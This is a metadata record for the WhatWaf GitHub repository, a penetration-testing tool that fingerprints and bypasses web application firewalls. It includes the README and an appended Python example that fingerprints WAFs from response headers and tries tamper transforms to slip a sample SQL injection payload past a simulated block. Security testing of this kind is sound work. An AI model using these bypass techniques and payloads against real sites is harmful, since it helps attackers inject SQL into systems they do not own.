{"id":13469343,"url":"https://github.com/Ekultek/WhatWaf","last_synced_at":"2025-03-26T06:32:07.911Z","repository":{"id":37484545,"uuid":"114396972","full_name":"Ekultek/WhatWaf","owner":"Ekultek","description":"Detect and bypass web application firewalls and protection systems","archived":false,"fork":false,"pushed_at":"2024-08-11T00:19:13.000Z","size":411,"stargazers_count":2739,"open_issues_count":477,"forks_count":451,"subscribers_count":74,"default_branch":"master","last_synced_at":"2025-03-20T05:09:22.815Z","etag":null,"topics":["bypass","detection","fingerprinting","firewall","waf","web-application","web-application-firewall","web-application-firewall-bypassing"],"latest_commit_sha":null,"homepage":"","language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"other","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Ekultek.png","metadata":{"files":{"readme":".github/README2.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE.md","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2017-12-15T17:47:45.000Z","updated_at":"2025-03-19T18:29:46.000Z","dependencies_parsed_at":"2024-01-25T12:07:18.255Z","dependency_job_id":"72a20f5f-c1a5-497c-b4d2-4c28cfa83bdf","html_url":"https://github.com/Ekultek/WhatWaf","commit_stats":{"total_commits":389,"total_committers":14,"mean_commits":"27.785714285714285","dds":0.6683804627249357,"last_synced_commit":"e8003dba130d296c0ce7efe57d5ada50fe846da4"},"previous_names":[],"tags_count":6,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf/tags","releases_url":"https:/
/repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Ekultek%2FWhatWaf/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Ekultek","download_url":"https://codeload.github.com/Ekultek/WhatWaf/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":245604109,"owners_count":20642939,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bypass","detection","fingerprinting","firewall","waf","web-application","web-application-firewall","web-application-firewall-bypassing"],"created_at":"2024-07-31T15:01:34.929Z","updated_at":"2025-03-26T06:32:06.334Z","avatar_url":"https://github.com/Ekultek.png","language":"Python","funding_links":[],"categories":["Python","Open Sources Intelligence (OSINT)","Tools","Web Exploitation"],"sub_categories":["Web application and resource analysis tools","Web Exploitation","Penetration Testing Report Templates"],"readme":"# Features\n - Ability to run on a single URL with the `-u/--url` flag\n - Ability to run through a list of URLs with the `-l/--list` flag\n - Ability to detect over 70 different firewalls\n - Ability to try over 30 different tampering techniques\n - Ability to pass your own payloads from a file or from the terminal, or to use the default payloads\n - Default payloads that _should_ trigger the WAF at least once\n - Ability to bypass firewalls using both SQLi and cross-site scripting techniques\n - Ability to run behind any proxy type 
that matches this regex: `(socks\\d+)?(http(s)?)?://` (socks5, socks4, http, https)\n - Ability to use a random user agent, a user agent of your own, or the built-in default\n - Automatically uses HTTP when no scheme is given, with the option to force HTTPS\n - A built-in encoder so you can encode your own payloads with the discovered bypass techniques\n - Automatic issue creation on the project's GitHub if an unknown firewall is discovered (check what it reports before running it against a client target)\n - Ability to send output to a JSON, CSV, or YAML file\n - Ability to encode provided payloads using the built-in tamper scripts\n - Encoded payloads are saved into a database file for future use\n - Ability to export cached payloads from the database to a YAML, JSON, CSV, or plain text file\n - Ability to save all traffic into files for further analysis by passing the `--traffic` flag\n - Ability to try to determine the backend web server hosting the web application using `-W`\n - Ability to send POST or GET requests\n - Ability to pass in your own custom headers\n - More to come...\n\n# Installation\n\nwhatwaf is compatible with Python 2 and Python 3. The simplest install is:\n\n```bash\n./setup.sh install\n```\n\nThis installs whatwaf into `~/.whatwaf/.install/bin`, so you can run it from the terminal as `whatwaf`.\n\nYou can also install it manually by running the following:\n```bash\nsudo -s \u003c\u003c EOF\ngit clone https://github.com/ekultek/whatwaf.git\ncd whatwaf\nchmod +x whatwaf.py\npip install -r requirements.txt\n./whatwaf.py --help\nEOF\n```\n\nOr you can run whatwaf in a virtual environment (requires `virtualenv` to be installed; nothing below needs root apart from installing `virtualenv` system-wide, so you can drop the `sudo -s` wrapper and run the commands directly):\n```bash\nsudo -s \u003c\u003c EOF\npip install virtualenv\ngit clone https://github.com/ekultek/whatwaf.git\ncd whatwaf\nchmod +x whatwaf.py\nvirtualenv venv \u0026\u0026 source venv/bin/activate\npip install -r requirements.txt\n./whatwaf.py --help\nEOF\n```\n\nYou can also install whatwaf using Docker with the following:\n```bash\ngit clone 
https://github.com/ekultek/whatwaf\ncd whatwaf\nsudo docker build -t whatwaf .\nsudo docker run -it whatwaf whatwaf --help\n```\n\n# Proof of concept\n\nFirst we'll run the website through WhatWaf and figure out which firewall protects it (if any):\n![item1](http://i67.tinypic.com/142y9s6.png)\n\nNext we'll go to that website and see what the page looks like:\n![item2](http://i64.tinypic.com/262mjhl.png)\n\nHmm.. the page itself gives no obvious hint of Cloudflare, does it? Let's see what the response headers say:\n![item4](http://i66.tinypic.com/5txx5x.png)\n\nAnd finally, let's try one of the bypasses it suggests:\n![item3](http://i66.tinypic.com/sdi3x0.png)\n\n# Demo video\n\n[![to_video](http://i67.tinypic.com/2daawow.png)](https://vimeo.com/247623511)\n\n# Get involved!\n\nIf you want to write tamper scripts, add functionality, or just make something look better, getting involved is easy:\n\n 1. Fork the repository\n 2. Edit the code to your liking\n 3. Send a pull request\n\nI'm always looking for helpful people and would love help with this little side project. Thanks!\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FEkultek%2FWhatWaf","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FEkultek%2FWhatWaf","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FEkultek%2FWhatWaf/lists"}
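The README above describes WhatWaf's workflow in two steps: fingerprint the protecting product from the HTTP response (the proof of concept does this from Cloudflare's headers), then run the payload through tamper scripts until one gets past the block. The block below is an added example written for this page, not WhatWaf's own code, and is in Python because WhatWaf is a Python tool. It runs entirely offline: `constructed_target` is a stand-in for a site behind a naive WAF, the `SIGNATURES` table is an illustrative subset I chose (the header names `Server: cloudflare`, `CF-RAY`, `Server: AkamaiGHost`, `X-Akamai-Transformed`, `X-CDN: Incapsula`, the `incap_ses`/`visid_incap` cookies, `Server: Sucuri/Cloudproxy` and `X-Sucuri-ID` are real product headers, but the matching rules and the block-detection heuristic are my assumptions), and the four tampers are the usual URL-encoding, double-encoding, case-mangling and comment-for-space transforms rather than WhatWaf's scripts.

```python
"""
Header-based WAF fingerprinting plus a tamper-driven bypass search.
Added example, not WhatWaf's own code; everything here runs offline
against a constructed target so the logic can be checked without a real site.
"""
import re
import urllib.parse

# Illustrative signature table (my assumption, not WhatWaf's database).
# A product matches if any one (header, regex) pair hits.
SIGNATURES = {
    "Cloudflare":        [("server", r"^cloudflare$"), ("cf-ray", r".+")],
    "Akamai":            [("server", r"^akamaighost$"), ("x-akamai-transformed", r".+")],
    "Imperva Incapsula": [("x-cdn", r"incapsula"), ("set-cookie", r"(incap_ses|visid_incap)_")],
    "Sucuri CloudProxy": [("server", r"sucuri/cloudproxy"), ("x-sucuri-id", r".+")],
}


def parse_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status, headers, body).

    Header names are lower-cased; repeated headers such as Set-Cookie are
    joined with '; ' so one regex can see all of them.
    """
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        name, value = name.strip().lower(), value.strip()
        headers[name] = headers[name] + "; " + value if name in headers else value
    return status, headers, body.decode("utf-8", "replace")


def fingerprint(headers):
    """Return the names of every product whose signatures match the headers."""
    return [name for name, sigs in SIGNATURES.items()
            if any(h in headers and re.search(rx, headers[h], re.I) for h, rx in sigs)]


def is_blocked(status, body):
    """Heuristic block detection: a WAF-style status code or a block-page phrase."""
    return (status in (403, 406, 429)
            or re.search(r"access denied|attention required|request blocked", body, re.I) is not None)


# Four tamper transforms of the kind WhatWaf's tamper scripts apply.
def space2comment(p):
    return p.replace(" ", "/**/")

def randomcase(p):  # deterministic alternating case so runs are reproducible
    return "".join(c.upper() if i % 2 else c.lower() for i, c in enumerate(p))

def urlencode(p):
    return urllib.parse.quote(p, safe="")

def doubleurlencode(p):
    return urllib.parse.quote(urllib.parse.quote(p, safe=""), safe="")

TAMPERS = {
    "space2comment": space2comment,
    "randomcase": randomcase,
    "urlencode": urlencode,
    "doubleurlencode": doubleurlencode,
}


def constructed_target(payload: str) -> bytes:
    """Constructed stand-in for a site behind a naive WAF (not a real service).

    It URL-decodes the input once and blocks anything matching UNION SELECT with
    a Cloudflare-style 403 (header values are made up); otherwise it returns 200.
    """
    seen = urllib.parse.unquote(payload)
    if re.search(r"union\s+select", seen, re.I):
        return (b"HTTP/1.1 403 Forbidden\r\nServer: cloudflare\r\n"
                b"CF-RAY: 0000000000000000-XXX\r\nContent-Type: text/html\r\n\r\n"
                b"<title>Attention Required! | Cloudflare</title>")
    return (b"HTTP/1.1 200 OK\r\nServer: nginx\r\nContent-Type: text/html\r\n\r\n"
            b"<html>ok</html>")


def find_bypasses(payload, send=constructed_target):
    """Send the raw payload, fingerprint the response, then try each tamper.

    `send` maps a payload string to raw response bytes (default: the constructed
    target). Returns the WAF seen, whether the raw payload was blocked, and the
    (tamper name, tampered payload) pairs that were not blocked.
    """
    status, headers, body = parse_response(send(payload))
    report = {"waf": fingerprint(headers), "blocked": is_blocked(status, body), "bypasses": []}
    if not report["blocked"]:
        return report
    for name, fn in TAMPERS.items():
        tampered = fn(payload)
        s, _, b = parse_response(send(tampered))
        if not is_blocked(s, b):
            report["bypasses"].append((name, tampered))
    return report


if __name__ == "__main__":
    print(find_bypasses("' UNION SELECT 1,2 --"))
```

Against the constructed target, `space2comment` and `doubleurlencode` get through while `randomcase` and single `urlencode` do not, and that pattern is itself a fingerprint: the rule matches case-insensitively on literal whitespace and decodes the parameter only once. A real engagement needs the extra step the tool cannot do for you, which is confirming that a "bypass" still reaches the backend as a working payload (the double-encoded one only does if the application decodes a second time) before reporting it.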